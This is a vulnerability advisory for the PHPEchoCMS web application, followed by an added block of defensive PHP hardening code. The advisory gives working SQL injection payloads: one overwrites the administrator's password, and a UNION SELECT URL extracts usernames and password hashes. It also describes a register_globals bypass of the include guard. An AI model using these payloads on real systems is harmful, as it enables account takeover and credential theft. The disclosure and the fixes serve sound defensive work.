Hello,

PHPEchoCMS Multiple remote vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx

First thing: full path disclosure in

    kernel/init.php
    modules/admin/index.php

Every file to be included has to have the value of the variable $BASE_LOAD set, but if register_globals is on then you can supply it from the browser like this:

    modules/files/index.php?BASE_LOAD=1

and the script will continue. The same applies to other files too.

modules/forum/index.php, lines [31-49]:

    if (@$_POST['post']=='thread') {
      if (@$_POST['id'] && $_POST['title'] && $_POST['contents']) {
        // Add the thread to the specified section
        $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', '".addslashes($_POST['id'])."', '-1', '".addslashes($_POST['title']).
               "', '".str_replace("\n", "<br>", addslashes($_POST['contents']))."', '".$_SESSION['username']."','".date("d-m-Y H:i")."', '0')";
        $res = query($ins, 1);
        $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);
        $res = query($ins, 1);
        $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);
        redirect ("index.php?module=forum&show=thread&id=".$nb);
      } else {
        $content = $mlang['017'];
      }
    }

See:

    $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);

This could be modified into an update query by posting the following value of id, as the next statement:

    id=union update members set password=[value] where id=1

Of course the value here should be an md5 hash, and since there are no quotes around the id the query will be ok :)

Lines [138-142]:

    elseif (@$_GET['show']=='thread' && $_GET['id']) {
      // Show a thread and its replies (child-threads)
      $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id=".addslashes($_GET['id']), 4);

Replace with:

    elseif (@$_GET['show']=='thread' && $_GET['id']) {
      // Show a thread and its replies (child-threads)
      $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id='".intval($_GET['id'])."'", 4);

Exploit:

    index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*

# WwW.SoQoR.NeT
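The root cause in both forum queries is the same: addslashes() only escapes quote characters, so an id that is concatenated into the SQL without surrounding quotes is passed through untouched. The intval() fix above closes the numeric case; the following is an added example (editor's code, not PHPEchoCMS code) of the more general hardening a maintainer would apply to the thread and section queries, plus a constant-based include guard that register_globals cannot override. The PDO connection $pdo, the PREFIX constant, and the function names parse_id, fetch_thread and touch_section are assumptions for illustration.

```php
<?php
// Added example, not part of PHPEchoCMS. Assumes a PDO handle $pdo and the PREFIX
// constant are defined by the application (both are assumptions).

// 1. Include guard. A constant cannot be set from the query string even with
//    register_globals = On, unlike a variable such as $BASE_LOAD.
if (!defined('BASE_LOAD')) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}

/**
 * Strict integer check for an id parameter (hypothetical helper).
 * Returns null for anything that is not a plain non-negative decimal integer,
 * so a value like "-1 union select ..." is rejected outright instead of being
 * silently truncated the way intval() would do.
 */
function parse_id($value): ?int
{
    if (!is_string($value) && !is_int($value)) {
        return null;
    }
    $s = (string) $value;
    if (!preg_match('/^[0-9]{1,10}$/', $s)) {
        return null;
    }
    return (int) $s;
}

/**
 * Fetch a thread by id with a prepared statement (hypothetical helper).
 * The id is bound as an integer, so no user-supplied text ever reaches the SQL parser.
 */
function fetch_thread(PDO $pdo, $rawId): ?array
{
    $id = parse_id($rawId);
    if ($id === null) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM `' . PREFIX . 'threads` WHERE `id` = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * Update a section's lastdate (hypothetical helper). The date is bound as a string,
 * so the driver quotes it; the section id is bound as an integer.
 */
function touch_section(PDO $pdo, $rawId): bool
{
    $id = parse_id($rawId);
    if ($id === null) {
        return false;
    }
    $stmt = $pdo->prepare('UPDATE `' . PREFIX . 'sections` SET `lastdate` = :d WHERE `id` = :id');
    $stmt->bindValue(':d', date('d-m-Y H:i'), PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    return $stmt->execute();
}

// Usage in the thread-display branch: a rejected id produces a "not found" page
// instead of a malformed query.
// $thread = fetch_thread($pdo, $_GET['id'] ?? null);
// if ($thread === null) { $content = 'Thread not found'; }
```

Binding with PDO::PARAM_INT is what makes the numeric WHERE clause safe; the regex in parse_id is an extra layer so that garbage input is logged or rejected rather than coerced to 0 and quietly matched against a different row.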